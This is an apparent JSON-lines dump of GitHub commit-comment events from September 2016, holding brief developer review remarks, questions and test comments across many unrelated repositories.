{"id":"4554415304","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18998298,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-13T09:21:54Z","updated_at":"2016-09-13T09:21:54Z","body":"@pb00068 : \r\nConcerning the size of the bonus, the usual approach used by Stefan, Alain and others, I believe, is to start with a S(20,20). Then play some games locally to see if there is a nice change of playing style for the games that the patched version has won. \r\n\r\nYou can also think about S(0,20) if the patch idea is important in the endgame, when the answer is *yes* to the question: \"*\"Should SF go for an endgame because of the idea in the patch?\"*\r\n\r\nOr S(20,0) if the patch idea is important in middle game, when the answer is *yes* to the question: *\"Should SF keep more pieces, especially more heavy pieces because of the idea of the patch?\"*"}},"created_at":"2016-09-13T09:21:54Z"}
{"id":"4554417909","type":"CommitCommentEvent","actor":{"login":"wnansseu"},"repo":{"name":"wnansseu/cours"},"payload":{"comment":{"id":18998307,"position":null,"line":null,"path":null,"commit_id":"286e661592021bd273538b12bd4b4d6a4da479ac","created_at":"2016-09-13T09:22:27Z","updated_at":"2016-09-13T09:22:27Z","body":"je ne trouve pas mes espaces "}},"created_at":"2016-09-13T09:22:27Z"}
{"id":"4554423339","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/eventos-web"},"payload":{"comment":{"id":18998323,"position":1,"line":1,"path":"devcamp.md","commit_id":"12db08a29a6d4195dfbb77b78e15226f482516a0","created_at":"2016-09-13T09:23:32Z","updated_at":"2016-09-13T09:23:32Z","body":"Refs #12 \r\n\r\n"}},"created_at":"2016-09-13T09:23:32Z"}
{"id":"4554426361","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18998328,"position":null,"line":null,"path":null,"commit_id":"0e125d5823e57378d3492e2186e81436bb0c79da","created_at":"2016-09-13T09:24:09Z","updated_at":"2016-09-13T09:24:09Z","body":"seem to be correct yes"}},"created_at":"2016-09-13T09:24:09Z"}
{"id":"4554428113","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/eventos-web"},"payload":{"comment":{"id":18998334,"position":5,"line":5,"path":"devcamp.md","commit_id":"12db08a29a6d4195dfbb77b78e15226f482516a0","created_at":"2016-09-13T09:24:28Z","updated_at":"2016-09-13T09:24:28Z","body":"Refs #13 "}},"created_at":"2016-09-13T09:24:28Z"}
{"id":"4554428966","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/eventos-web"},"payload":{"comment":{"id":18998338,"position":4,"line":4,"path":"cryptorave.md","commit_id":"12db08a29a6d4195dfbb77b78e15226f482516a0","created_at":"2016-09-13T09:24:38Z","updated_at":"2016-09-13T09:24:38Z","body":"Refs #12 "}},"created_at":"2016-09-13T09:24:38Z"}
{"id":"4554433296","type":"CommitCommentEvent","actor":{"login":"rcavalcanti"},"repo":{"name":"strongtyped/fun-cqrs"},"payload":{"comment":{"id":18998355,"position":55,"line":205,"path":"modules/akka/src/main/scala/io/funcqrs/akka/AggregateActor.scala","commit_id":"7dcc60f85b61a9e0cdf2ae709e7bf1105f938dca","created_at":"2016-09-13T09:25:31Z","updated_at":"2016-09-13T09:25:31Z","body":"Btw, there is another bug here. \r\n`origSender ! events` is called before the events are persisted.\r\n\r\nThe problem here is that `persistAll` saves all events atomically, but call the handler function `events.size` times."}},"created_at":"2016-09-13T09:25:31Z"}
{"id":"4554436703","type":"CommitCommentEvent","actor":{"login":"robotboy655"},"repo":{"name":"Facepunch/garrysmod-issues"},"payload":{"comment":{"id":18998366,"position":5,"line":5,"path":".github/ISSUE_TEMPLATE.md","commit_id":"82d5a2f27a3c6c351f8dfb6eadc1f3ae7c345857","created_at":"2016-09-13T09:26:13Z","updated_at":"2016-09-13T09:26:13Z","body":"to to to to to to to to "}},"created_at":"2016-09-13T09:26:13Z"}
{"id":"4554437856","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":18998369,"position":null,"line":null,"path":null,"commit_id":"f3b230fb4b010e98197eb605fad9fc9f01637d5a","created_at":"2016-09-13T09:26:24Z","updated_at":"2016-09-13T09:26:24Z","body":":+1: "}},"created_at":"2016-09-13T09:26:24Z"}
{"id":"4554443190","type":"CommitCommentEvent","actor":{"login":"sylvainvuidart"},"repo":{"name":"SlimPay/hapiclient-php"},"payload":{"comment":{"id":18998384,"position":null,"line":null,"path":null,"commit_id":"cea4f7e4604d3aa58f6dce2a2d71d202bc6fa5c5","created_at":"2016-09-13T09:27:29Z","updated_at":"2016-09-13T09:27:29Z","body":"Thx !"}},"created_at":"2016-09-13T09:27:29Z"}
{"id":"4554443825","type":"CommitCommentEvent","actor":{"login":"fetka"},"repo":{"name":"fetka/recipes"},"payload":{"comment":{"id":18998387,"position":null,"line":null,"path":null,"commit_id":"7f70fd20bd74c96bc96380420d0afe2e09af1833","created_at":"2016-09-13T09:27:36Z","updated_at":"2016-09-13T09:27:36Z","body":"change vegetable oil to canola oil"}},"created_at":"2016-09-13T09:27:36Z"}
{"id":"4554443890","type":"CommitCommentEvent","actor":{"login":"aminema"},"repo":{"name":"RocyLuo/IEC104TCP"},"payload":{"comment":{"id":18998388,"position":null,"line":null,"path":null,"commit_id":"408fae625492d2150b4c81e433dbffda6fd39ed1","created_at":"2016-09-13T09:27:37Z","updated_at":"2016-09-13T09:27:37Z","body":"Dear rockylou,\r\nI want to sniff packets between master and client using iec104 by scappy.how I can use your codes.\r\nThanks\r\n"}},"created_at":"2016-09-13T09:27:37Z"}
{"id":"4554445455","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18998392,"position":74,"line":601,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T09:27:56Z","updated_at":"2016-09-13T09:27:56Z","body":"yep that's what I meant. from the pure yunohost point of view, having this only written once would improve maintainability. now that you have reduced it to a one liner, this can be balanced with the need to keep ssowat simple and standalone, agreed."}},"created_at":"2016-09-13T09:27:56Z"}
{"id":"4554449146","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18998396,"position":16,"line":8315,"path":"sql/database.sql","commit_id":"3fc6f93583913d77fc096f6d7015b7bd8a142472","created_at":"2016-09-13T09:28:38Z","updated_at":"2016-09-13T09:28:38Z","body":"Removed."}},"created_at":"2016-09-13T09:28:38Z"}
{"id":"4554451094","type":"CommitCommentEvent","actor":{"login":"andronz"},"repo":{"name":"wongatech/HealthMonitoring"},"payload":{"comment":{"id":18998404,"position":7,"line":31,"path":"make/Makefile.ps1","commit_id":"2a1ba0d568097e6dac4a449ce1cb5be77aca4294","created_at":"2016-09-13T09:29:03Z","updated_at":"2016-09-13T09:29:03Z","body":"ok, its ok, reviewed f2f with Pasha"}},"created_at":"2016-09-13T09:29:03Z"}
{"id":"4554452564","type":"CommitCommentEvent","actor":{"login":"HappyEmu"},"repo":{"name":"swissdrg/grouperserve"},"payload":{"comment":{"id":18998408,"position":113,"line":95,"path":"src/main/java/ch/eonum/grouperserve/GrouperServe.java","commit_id":"75d416e2cec2ce0b8339a50fbfb83b202849ad79","created_at":"2016-09-13T09:29:21Z","updated_at":"2016-09-13T09:29:21Z","body":"@tschimbr Yes. We need the diagnoses and procedures for the single case webgrouper result. We dont care about the other fields of the patient case and, as you said, in order to keep the responses small, we dont include them."}},"created_at":"2016-09-13T09:29:21Z"}
{"id":"4554454672","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18998416,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-13T09:29:47Z","updated_at":"2016-09-13T09:29:47Z","body":"@snicolet Thanks very much for the response, I will try something after this test has ended and its result is clear."}},"created_at":"2016-09-13T09:29:47Z"}
{"id":"4554456483","type":"CommitCommentEvent","actor":{"login":"linh47"},"repo":{"name":"crosg/FloatMenuSample"},"payload":{"comment":{"id":18998422,"position":null,"line":null,"path":null,"commit_id":"4fc3b2b4c670a615be346b9d14e06532f1acd953","created_at":"2016-09-13T09:30:11Z","updated_at":"2016-09-13T09:30:11Z","body":"感谢您的注释，使我理解了一些代码的作用。\r\n另外我还有一个问题向您请教——\r\n请问：如果想要弹出来的子菜单是一个弧形（RelativeLayout）而不是直线形(LinearLayout)，在代码中根据子菜单个数来计算半径、弧形的角度等等，要改哪个部分呢？\r\nMenuItemView似乎是每一个子菜单的布局？（包含ImageView和TextView？）不知道我理解的对不对。\r\n\r\n我想要的是在代码中改变与logo的framelayout平行的子菜单项的一个总的布局（即也在LinearLayout内，当然LinearLayout改成RelativeLayout更好），最好这个布局是继承viewgroup的，然后就可以对其内的按钮onLayout()。\r\n想实现这样的效果但是我不知道如何修改 子菜单的添加和如何布局。如果您感兴趣的话可以抽空回复一下吗？"}},"created_at":"2016-09-13T09:30:11Z"}
{"id":"4554458142","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":18998426,"position":null,"line":null,"path":null,"commit_id":"2ea5fdd6213c58dadbe507653205b9bd4cf65011","created_at":"2016-09-13T09:30:30Z","updated_at":"2016-09-13T09:30:30Z","body":"@M4tt30rru : take a look. We can do something about it."}},"created_at":"2016-09-13T09:30:30Z"}
{"id":"4554462612","type":"CommitCommentEvent","actor":{"login":"rakshans1"},"repo":{"name":"rakshans1/docstash"},"payload":{"comment":{"id":18998440,"position":null,"line":null,"path":null,"commit_id":"307038d0cc0f2f4e64ae29b3d195cba1451d3460","created_at":"2016-09-13T09:31:22Z","updated_at":"2016-09-13T09:31:22Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;7gZjLdVJ&#x2F;129-torrent-implementation\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Torrent Implementation</a>"}},"created_at":"2016-09-13T09:31:22Z"}
{"id":"4554462683","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18998441,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T09:31:23Z","updated_at":"2016-09-13T09:31:23Z","body":"Weird.. I already got this frameworks patch but still getting error in 'isPersisted()' method"}},"created_at":"2016-09-13T09:31:23Z"}
{"id":"4554463253","type":"CommitCommentEvent","actor":{"login":"mvkorpel"},"repo":{"name":"onertipaday/RXKCD"},"payload":{"comment":{"id":18998444,"position":71,"line":127,"path":"pkg/R/getXKCD.R","commit_id":"218f45bd77f40f859fcfbbf3a8670a431cdab96a","created_at":"2016-09-13T09:31:30Z","updated_at":"2016-09-13T09:31:30Z","body":"British / American spelling is a matter of opinion. Using \"favorite\" here for consistency with other occurrences of the word in this package."}},"created_at":"2016-09-13T09:31:30Z"}
{"id":"4554465182","type":"CommitCommentEvent","actor":{"login":"DerOrakel"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18998458,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-13T09:31:54Z","updated_at":"2016-09-13T09:31:54Z","body":"Using the latest platformio it works fine."}},"created_at":"2016-09-13T09:31:54Z"}
{"id":"4554469529","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18998480,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T09:32:46Z","updated_at":"2016-09-13T09:32:46Z","body":"Did you remove the override like in this commit?"}},"created_at":"2016-09-13T09:32:46Z"}
{"id":"4554473777","type":"CommitCommentEvent","actor":{"login":"WEI-Jialiang"},"repo":{"name":"WEI-Jialiang/cours"},"payload":{"comment":{"id":18998511,"position":null,"line":null,"path":null,"commit_id":"cb53274c97d57579f9fec474c55d97acbd8fb685","created_at":"2016-09-13T09:33:36Z","updated_at":"2016-09-13T09:33:36Z","body":"tester"}},"created_at":"2016-09-13T09:33:36Z"}
{"id":"4554474083","type":"CommitCommentEvent","actor":{"login":"cgalvarez"},"repo":{"name":"serut/meteor-coverage"},"payload":{"comment":{"id":18998515,"position":null,"line":null,"path":null,"commit_id":"899f7c39162cbe8ff72e180c9c6c78217bc38510","created_at":"2016-09-13T09:33:40Z","updated_at":"2016-09-13T09:33:40Z","body":"@serut Just some comments:\r\n\r\n- Section **Global environment variable** (deprecated): *Using spacejam --coverage you do not have to set up global environment variable.* ==> This is not true for `COVERAGE_VERBOSE`. You have to set this flag on manually through command line or settings file.\r\n- Section **Config file** and file `conf/default-coverage.json`:\r\n    - The glob pattern `**/.npm/package/node_modules/**` is already catched by `**/.?*/**`, which excludes **any** hidden folder, but does not cover `node_modules` folder in a meteor app (in a meteor app, the NPM modules used are installed at `node_modules`, not `.npm/package/node_modules`), and that's why I set it up as `**/node_modules/**`. I'm developing a meteor app with `angular2-meteor`, and all the NPM packages are saved to `node_modules/**`, so the current glob pattern presumably will not catch it (not tested yet, I'm focused on meteor package testing right now).\r\n    - `**/web.browser/packages/**` is already catched by `**/packages/!(local-test_?*.js)`, except the last one will exclude the compiled & run test file, which it's needed to traverse the tested file(s) through its source map.\r\n    - Well done splitting all the test patterns to improve readability!! :wink: \r\n    - Very well done moving pattern into server/client keys. I was seeking to reduce complexity of default `.coverage.json`, but your approach is way much better for the user. :+1::+1: \r\n- Section **Ignore code from coverage with annotation**: other examples of coverage distortion could be using the ternary operator (`expression ? value1 : value2`) or default assignments (like `let myVar = otherVar || {}`), which I always get marked as uncovered branches.\r\n- Section **Meteor ignored folders and files**:\r\n    - Right now, the special folder `node_modules` is not always excluded due to the issue explained above.\r\n    - At the fourth item of the list, the first and last asterisks of the first glob pattern are interpreted by GitHub as styling that portion of text as italic (and thus not shown): you can style those portions as code (`*.(specs?|tests?|app-specs?|app-tests?).*`) or escape those asterisks (\\*.(specs?|tests?|app-specs?|app-tests?).\\*), whatever you prefer.\r\n\r\nOtherwise, great `readme.md` update and very well explained :wink: :smile: \r\n\r\nThank you very much for your hard work!!"}},"created_at":"2016-09-13T09:33:40Z"}
{"id":"4554474344","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18998517,"position":56,"line":561,"path":"helpers.lua","commit_id":"6d82263b9e3ae3e1368cd246cb22f0986f0e41d3","created_at":"2016-09-13T09:33:43Z","updated_at":"2016-09-13T09:33:43Z","body":"this sub(1, -2) is quite cryptic, can we avoid it ?\r\nI guess this is to handle end of line character in which case :\r\n```\r\nimport crypt,sys; sys.stdout.write(crypt.crypt(\"thepassword\", \"$6$%.12s\"))\r\n```\r\nwould do the job"}},"created_at":"2016-09-13T09:33:43Z"}
{"id":"4554477153","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18998525,"position":null,"line":null,"path":null,"commit_id":"25e0c5f6572601d814c043842472ffb001e94210","created_at":"2016-09-13T09:34:21Z","updated_at":"2016-09-13T09:34:21Z","body":"i didnt had chance for now to test guardian creature pet's so i'll do it.\r\nThis is not correct.\r\n- now guardian have their own threatlist\r\n- EnterEvade() can be overwrited so no need to create a guadianevade.\r\n- If the issue https://github.com/cmangos/issues/issues/179 still exist then we only have to fix combat condition for guardianai in updateAI."}},"created_at":"2016-09-13T09:34:21Z"}
{"id":"4554477636","type":"CommitCommentEvent","actor":{"login":"mediaweb03"},"repo":{"name":"mediaweb03/sis"},"payload":{"comment":{"id":18998529,"position":null,"line":null,"path":null,"commit_id":"60ef0064c5c234c6b49f64c66470d191b951f032","created_at":"2016-09-13T09:34:26Z","updated_at":"2016-09-13T09:34:26Z","body":"This is a test"}},"created_at":"2016-09-13T09:34:26Z"}
{"id":"4554478451","type":"CommitCommentEvent","actor":{"login":"pgiraud"},"repo":{"name":"camptocamp/demo_geomapfish"},"payload":{"comment":{"id":18998534,"position":14,"line":162,"path":"demo/templates/mobile.html","commit_id":"85a59ec5cbbbd9c2edf166db7ab9c484f2f50d92","created_at":"2016-09-13T09:34:34Z","updated_at":"2016-09-13T09:34:34Z","body":"This doesn't seem to be syntactically correct."}},"created_at":"2016-09-13T09:34:34Z"}
{"id":"4554478553","type":"CommitCommentEvent","actor":{"login":"yeongseon"},"repo":{"name":"yeongseon/yeongseon.github.io"},"payload":{"comment":{"id":18998535,"position":null,"line":null,"path":null,"commit_id":"872dcd7d83e84606fc3d4c2829b5edd88afc9bd6","created_at":"2016-09-13T09:34:35Z","updated_at":"2016-09-13T09:34:35Z","body":"disqus가 제대로 로드되지 않는 문제 해결\r\n참고 : https://help.disqus.com/customer/portal/articles/542119-can-disqus-be-loaded-via-https"}},"created_at":"2016-09-13T09:34:35Z"}
{"id":"4554479775","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18998548,"position":null,"line":null,"path":null,"commit_id":"df8d535230d4066017567b36964f5b854be9090d","created_at":"2016-09-13T09:34:50Z","updated_at":"2016-09-13T09:34:50Z","body":"Is `CPUMAX=1516000` a typo and should read 1536000 instead?"}},"created_at":"2016-09-13T09:34:50Z"}
{"id":"4554480327","type":"CommitCommentEvent","actor":{"login":"zzeman"},"repo":{"name":"zzeman/hello-world"},"payload":{"comment":{"id":18998553,"position":null,"line":null,"path":null,"commit_id":"45657a5320613403fee8a3e6b5b4ceb3d30291b9","created_at":"2016-09-13T09:34:56Z","updated_at":"2016-09-13T09:34:56Z","body":"test program change 02"}},"created_at":"2016-09-13T09:34:56Z"}
{"id":"4554481121","type":"CommitCommentEvent","actor":{"login":"a1104321118"},"repo":{"name":"a1104321118/test"},"payload":{"comment":{"id":18998556,"position":null,"line":null,"path":null,"commit_id":"a6b5036418c704dd89a3da7e61a7985d09cb64a3","created_at":"2016-09-13T09:35:08Z","updated_at":"2016-09-13T09:35:08Z","body":"111"}},"created_at":"2016-09-13T09:35:08Z"}
{"id":"4554484478","type":"CommitCommentEvent","actor":{"login":"agherzan"},"repo":{"name":"resin-os/meta-resin"},"payload":{"comment":{"id":18998569,"position":6,"line":57,"path":"meta-resin-common/recipes-core/images/resin-image.bb","commit_id":"7a1223d3ed65531beb22d0ee0cd5796530385393","created_at":"2016-09-13T09:35:46Z","updated_at":"2016-09-13T09:35:46Z","body":"Is this throwing an error if the file doesn't exit?"}},"created_at":"2016-09-13T09:35:46Z"}
{"id":"4554486269","type":"CommitCommentEvent","actor":{"login":"agherzan"},"repo":{"name":"resin-os/meta-resin"},"payload":{"comment":{"id":18998573,"position":6,"line":57,"path":"meta-resin-common/recipes-core/images/resin-image.bb","commit_id":"7a1223d3ed65531beb22d0ee0cd5796530385393","created_at":"2016-09-13T09:36:09Z","updated_at":"2016-09-13T09:36:09Z","body":"*if the source file doesn't exist"}},"created_at":"2016-09-13T09:36:09Z"}
{"id":"4554487129","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18998578,"position":null,"line":null,"path":null,"commit_id":"1209d98c4e450f29156155b14703ad80e1a2a0be","created_at":"2016-09-13T09:36:18Z","updated_at":"2016-09-13T09:36:18Z","body":":+1: "}},"created_at":"2016-09-13T09:36:18Z"}
{"id":"4554488085","type":"CommitCommentEvent","actor":{"login":"eppfel"},"repo":{"name":"owncloud/bookmarks"},"payload":{"comment":{"id":18998583,"position":21,"line":46,"path":"appinfo/application.php","commit_id":"8f5baa3f32ee5a73b7524c55c76f5710d5989933","created_at":"2016-09-13T09:36:30Z","updated_at":"2016-09-13T09:36:30Z","body":"Shouldn't this be `$uid`?"}},"created_at":"2016-09-13T09:36:30Z"}
{"id":"4554490997","type":"CommitCommentEvent","actor":{"login":"FitBoy"},"repo":{"name":"FitBoy/iOScodeRepo"},"payload":{"comment":{"id":18998601,"position":null,"line":null,"path":null,"commit_id":"e8da44671296caea6a14917c00eca18cbe6e8355","created_at":"2016-09-13T09:37:08Z","updated_at":"2016-09-13T09:37:08Z","body":"第一次测试"}},"created_at":"2016-09-13T09:37:08Z"}
{"id":"4554497413","type":"CommitCommentEvent","actor":{"login":"praveengadiyaram369"},"repo":{"name":"praveengadiyaram369/ocr_watermeterreading"},"payload":{"comment":{"id":18998627,"position":1,"line":1,"path":"README.md","commit_id":"4244dfa9f4acdf87bdf69718685e036558fa6411","created_at":"2016-09-13T09:38:26Z","updated_at":"2016-09-13T09:38:26Z","body":"/*\r\n\r\n            ****  Software required :         1)opencv\r\n                                        2)visual studio\r\n\r\n\r\n            ****  Install visual studio and link opencv to visual studio.\r\n\r\n\r\n            ****   Add deskew.h file to the project folder.\r\n\r\n\r\n            ****  Create new .cpp file in the project\r\n         \r\n            **** copy trainingknnc++.txt  to the .cpp file created above.(Make sure that directory inside the imread points to the images in ocrknn folder)\r\n\r\n            ****  copy watermeter_gaia.txt  to c++ file and change the directory to image of watermeter reading. \r\n\r\n\r\n\r\n*/"}},"created_at":"2016-09-13T09:38:26Z"}
{"id":"4554499038","type":"CommitCommentEvent","actor":{"login":"mgupta1410"},"repo":{"name":"mgupta1410/mgupta1410.github.io"},"payload":{"comment":{"id":18998635,"position":10,"line":179,"path":"speechanalysis.html","commit_id":"c0afbcb2b785d92d5880f0c4c485ed39c1410f78","created_at":"2016-09-13T09:38:47Z","updated_at":"2016-09-13T09:38:47Z","body":"Thanks for pointing out!"}},"created_at":"2016-09-13T09:38:47Z"}
{"id":"4554499324","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18998638,"position":4,"line":57,"path":"plugins/LayerView/LayerView.py","commit_id":"f527da2f3c309d27973ad19e2b513bed5d17e36c","created_at":"2016-09-13T09:38:51Z","updated_at":"2016-09-13T09:38:51Z","body":"'Message' and 'i18n_catalog' are not defined or imported anywhere in this file. :(\r\n"}},"created_at":"2016-09-13T09:38:51Z"}
{"id":"4554502518","type":"CommitCommentEvent","actor":{"login":"tschimbr"},"repo":{"name":"swissdrg/grouperserve"},"payload":{"comment":{"id":18998655,"position":113,"line":95,"path":"src/main/java/ch/eonum/grouperserve/GrouperServe.java","commit_id":"75d416e2cec2ce0b8339a50fbfb83b202849ad79","created_at":"2016-09-13T09:39:31Z","updated_at":"2016-09-13T09:39:31Z","body":"@HappyEmu : You are right. By omitting the demographic variables validations you gain some milliseconds. However I will not merge this as we need either no validations at all or all validations."}},"created_at":"2016-09-13T09:39:31Z"}
{"id":"4554504008","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18998666,"position":56,"line":561,"path":"helpers.lua","commit_id":"6d82263b9e3ae3e1368cd246cb22f0986f0e41d3","created_at":"2016-09-13T09:39:50Z","updated_at":"2016-09-13T09:39:50Z","body":"Also your current code is only python2-compatible, so we'll have a surprise here when switching to python3"}},"created_at":"2016-09-13T09:39:50Z"}
{"id":"4554506840","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/eventos-web"},"payload":{"comment":{"id":18998677,"position":null,"line":null,"path":null,"commit_id":"0b9b368bedfb9dc96025b6943258173f1e8d1648","created_at":"2016-09-13T09:40:24Z","updated_at":"2016-09-13T09:40:24Z","body":"#1 "}},"created_at":"2016-09-13T09:40:24Z"}
{"id":"4554507636","type":"CommitCommentEvent","actor":{"login":"linaiyu"},"repo":{"name":"linaiyu/learngit"},"payload":{"comment":{"id":18998679,"position":null,"line":null,"path":null,"commit_id":"33d87efe15bcc080c22bacbf17496840a9c5928e","created_at":"2016-09-13T09:40:33Z","updated_at":"2016-09-13T09:40:33Z","body":"it's a good resource."}},"created_at":"2016-09-13T09:40:33Z"}
{"id":"4554509645","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/eventos-web"},"payload":{"comment":{"id":18998692,"position":null,"line":null,"path":null,"commit_id":"094cb866491d61dec8d3b2feed0a08b625dac049","created_at":"2016-09-13T09:40:57Z","updated_at":"2016-09-13T09:40:57Z","body":"#1"}},"created_at":"2016-09-13T09:40:57Z"}
{"id":"4554512236","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998707,"position":7,"line":70,"path":"app/config/config.yml","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:41:29Z","updated_at":"2016-09-13T09:41:29Z","body":"Czy ten komentarz ma sens?"}},"created_at":"2016-09-13T09:41:29Z"}
{"id":"4554512692","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18998708,"position":24,"line":587,"path":"truffle/src/main/java/org/jruby/truffle/extra/TrufflePosixNodes.java","commit_id":"553bfc90cae578c9c0bb3bb903c0d5fa77b05204","created_at":"2016-09-13T09:41:34Z","updated_at":"2016-09-13T09:41:34Z","body":"I'd rather remove relying on the JRuby runtime, but I didn't dare to do it yet."}},"created_at":"2016-09-13T09:41:34Z"}
{"id":"4554515710","type":"CommitCommentEvent","actor":{"login":"ivo--t"},"repo":{"name":"TWOEARS/identification-training-pipeline"},"payload":{"comment":{"id":18998723,"position":28,"line":28,"path":"test/nSrcDetection.m","commit_id":"4ef22046a3bcfdd103d4839ff5f10c8646e93b08","created_at":"2016-09-13T09:42:13Z","updated_at":"2016-09-13T09:42:13Z","body":"Yes! Use PerformanceMeasures.MultinomialBAC, which you have commented out above ;). Same for the glmnet option ('family', 'multinomial')."}},"created_at":"2016-09-13T09:42:13Z"}
{"id":"4554520107","type":"CommitCommentEvent","actor":{"login":"DavidAnugrah"},"repo":{"name":"DavidAnugrah/SendEmailTLS"},"payload":{"comment":{"id":18998740,"position":null,"line":null,"path":null,"commit_id":"eb5ede4e427d15c155e8fb4dd43ac0acebe47055","created_at":"2016-09-13T09:43:06Z","updated_at":"2016-09-13T09:43:06Z","body":"Send Email dengan TLS"}},"created_at":"2016-09-13T09:43:06Z"}
{"id":"4554521543","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18998748,"position":58,"line":58,"path":"truffle/src/main/java/org/jruby/truffle/core/InlinedCoreMethodNode.java","commit_id":"b904bda76966fe839fe899f23320d7a75e02c5e2","created_at":"2016-09-13T09:43:22Z","updated_at":"2016-09-13T09:43:22Z","body":"Yeah I went for a more general approach but we can refine it either way."}},"created_at":"2016-09-13T09:43:22Z"}
{"id":"4554523828","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18998757,"position":null,"line":null,"path":null,"commit_id":"51f758fb1e90a929af69de1ee45cc86e7c6913be","created_at":"2016-09-13T09:43:50Z","updated_at":"2016-09-13T09:43:50Z","body":"Was this committed directly? This seems like a pretty huge change not to pullreq."}},"created_at":"2016-09-13T09:43:50Z"}
{"id":"4554527249","type":"CommitCommentEvent","actor":{"login":"d1r3ct"},"repo":{"name":"d1r3ct/legendary-octo-doodle"},"payload":{"comment":{"id":18998767,"position":50,"line":50,"path":"index.js","commit_id":"0371b3a5ab3661044e2ec005b67488f0c081a2c2","created_at":"2016-09-13T09:44:32Z","updated_at":"2016-09-13T09:44:32Z","body":"yo what is that"}},"created_at":"2016-09-13T09:44:32Z"}
{"id":"4554529987","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18998777,"position":null,"line":null,"path":null,"commit_id":"b904bda76966fe839fe899f23320d7a75e02c5e2","created_at":"2016-09-13T09:45:04Z","updated_at":"2016-09-13T09:45:04Z","body":"> Try to measure the impact?\r\n\r\nYes, early results show that `def foo; 1 + 2 * 3; end` is about twice faster in interpreter."}},"created_at":"2016-09-13T09:45:04Z"}
{"id":"4554532450","type":"CommitCommentEvent","actor":{"login":"bloerwald"},"repo":{"name":"justMaku/DecompiledWoWLegionCompanion"},"payload":{"comment":{"id":18998782,"position":32,"line":428,"path":"Login.cs","commit_id":"2497e6b1ba8a019facedc8d63a54ffef1b0fbce9","created_at":"2016-09-13T09:45:34Z","updated_at":"2016-09-13T09:45:34Z","body":"Oh god, thank you. This was such a miserable experience. I'd probably even opt for `10f`."}},"created_at":"2016-09-13T09:45:34Z"}
{"id":"4554537695","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18998794,"position":null,"line":null,"path":null,"commit_id":"24054b4de015fe8f835e126ab196d667539e7dc3","created_at":"2016-09-13T09:46:36Z","updated_at":"2016-09-13T09:46:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 984](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13156&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-13T09:46:36Z"}
